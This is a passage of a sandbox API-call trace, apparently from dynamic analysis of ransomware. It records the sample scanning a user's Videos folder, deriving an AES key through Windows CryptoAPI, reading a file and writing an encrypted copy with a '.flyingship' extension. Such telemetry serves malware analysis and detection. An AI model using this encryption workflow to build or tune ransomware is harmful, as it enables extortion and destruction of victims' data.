lpString1="Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ioo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.451] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.451] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.451] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.451] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0x90ae18 [0198.452] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.453] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.453] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.453] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0198.454] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.456] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.456] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.457] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.457] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.457] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.457] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.457] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.457] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0198.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.458] CryptDestroyHash (hHash=0x90af58) returned 1 [0198.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\tv3avy6ign_a.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.459] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.459] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.461] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t")) returned 0x10 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\tv3avy6ign_a.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0198.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.466] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.466] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0198.469] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1e7e, lpOverlapped=0x0) returned 1 [0198.469] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11e7e) returned 0xbea018 [0198.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11e7e) returned 0xbfbea0 [0198.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.473] 